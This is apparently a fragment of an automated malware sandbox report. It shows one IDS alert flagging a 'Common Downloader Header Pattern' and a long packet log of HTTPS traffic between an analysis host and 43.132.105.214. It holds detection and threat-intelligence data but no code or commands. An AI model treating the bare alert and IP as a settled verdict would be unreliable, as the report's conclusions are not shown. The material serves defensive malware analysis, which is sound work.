                                                                        IgboNigeria
                                                                        MaoriNew Zealand
                                                                        ChineseChina
                                                                        EnglishGreat Britain
                                                                        PortuguesePortugal
                                                                        GaelicIreland
                                                                        BosnianBosnian
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-03-12T10:22:30.452418+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.64968643.132.105.214443TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 12, 2025 10:22:26.677850962 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:26.677889109 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:26.678035021 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:26.910500050 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:26.910525084 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:29.640178919 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:29.640260935 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:29.641345978 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:29.641396999 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:29.799050093 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:29.799071074 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:29.799402952 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:29.799451113 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:29.800630093 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:29.848340988 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.452444077 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.452478886 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.452512980 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.452532053 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.452543020 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.452589989 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.528603077 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.528620958 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.528695107 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.528706074 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.528740883 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.541248083 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.541333914 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.541346073 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.541387081 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.560218096 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.560286999 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.560300112 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.560342073 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.582324028 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.582396984 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.582412004 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.582453966 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.599140882 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.599212885 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.599226952 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.599266052 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.617157936 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.617227077 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.617242098 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.617280960 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.628041029 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.628113985 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.628124952 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.628164053 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.640542984 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.640609026 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.640623093 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.640661955 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.650505066 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.650571108 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.650585890 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.650623083 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.660336971 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.660407066 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.660422087 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.660468102 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.698694944 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.698714972 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.698765993 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.698781967 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.698828936 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.718190908 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.718209982 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.718280077 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.718298912 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.718341112 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.732455969 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.732472897 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.732541084 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.732558012 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.732609034 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.744604111 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.744637966 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.744674921 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.744684935 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.744720936 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.750447035 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.750515938 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.750526905 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.750562906 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.759531021 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.759547949 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.759608984 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.759622097 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.759663105 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.764750004 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.764816999 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.764831066 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.764868975 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.770011902 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.770073891 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.770086050 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.770160913 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.786412954 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.786489010 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.786498070 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.786546946 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.796775103 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.796791077 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.796825886 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.796838999 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.796880007 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.805600882 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.805615902 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.805665970 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.805676937 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.805706978 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.805727005 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.810502052 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.810564041 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.810575008 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.810616016 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.823043108 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.823066950 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.823131084 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.823143959 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.823178053 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.823188066 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.829380035 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.829396963 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.829463005 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.829477072 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.829515934 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.939630985 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.939650059 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.939697981 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.939713001 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.939743996 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.939759970 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.955777884 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.955832005 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.955838919 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.955851078 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.955900908 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.967339039 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.967406034 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.967417955 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.967466116 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.971873045 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.971940041 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.971950054 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.971991062 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.977406979 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.977471113 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.977484941 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.977521896 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.980678082 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.980695963 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.980751038 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.980763912 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.980799913 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.989603996 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.989620924 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.989669085 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.989684105 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:30.989711046 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:30.989728928 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.005115986 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.005136013 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.005188942 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.005203009 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.005230904 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.005247116 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.027925968 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.027993917 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.028002977 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.028022051 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.028045893 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.028053045 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.028069019 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.046556950 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.046591997 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.046627998 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.046638966 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.046685934 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.048620939 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.048696995 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.048707008 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.048749924 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.056853056 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.056920052 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.056929111 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.056972027 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.058593035 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.058654070 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.058662891 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.058701992 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.060863018 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.060931921 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.060941935 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.060981035 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.064357996 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.064424038 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.064438105 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.064472914 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.070235968 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.070307016 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.070316076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.070357084 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.083708048 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.083725929 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.083759069 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.083818913 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.083827019 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.083867073 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.098774910 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.098792076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.098862886 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.098881960 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.098927975 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.101586103 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.101602077 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.101643085 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.101654053 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.101680994 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.101696968 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.116425037 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.116471052 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.116482973 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.116502047 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.116533041 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.116553068 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.134485960 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.134502888 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.134546995 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.134555101 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.134591103 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.134603977 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.136482000 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.136560917 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.136567116 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.136635065 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.146383047 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.146398067 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.146445990 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.146450996 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.146478891 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.146500111 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.148890972 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.148955107 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.148962975 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.149000883 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.151818991 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.151887894 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.151895046 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.151947975 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.169075966 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.169094086 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.169150114 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.169179916 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.169195890 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.169222116 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.171214104 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.171288967 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.171297073 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.171345949 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.173175097 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.173233032 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.173239946 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.173276901 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.186153889 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.186198950 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.186239958 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.186248064 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.186273098 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.186295986 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.188430071 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.188498974 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.188507080 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.188549042 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.191323996 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.191401958 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.191410065 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.191457987 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.216801882 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.216844082 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.216901064 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.216916084 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.216963053 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.225132942 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.225203991 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.225244999 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.225311041 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.235127926 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.235173941 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.235199928 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.235209942 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.235239983 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.235250950 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.240485907 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.240561008 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.240561008 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.240582943 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.240617037 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.240634918 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.257757902 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.257805109 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.257824898 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.257837057 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.257874966 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.257896900 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.257972002 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.258023024 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.259943962 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.260016918 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.260026932 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.260063887 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.268160105 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.268208981 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.268233061 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.268240929 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.268274069 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.268285990 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.276720047 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.276783943 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.276793957 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.276822090 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.276849985 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.276871920 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.293530941 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.293576956 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.293611050 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.293623924 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.293651104 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.293670893 CET49686443192.168.2.643.132.105.214
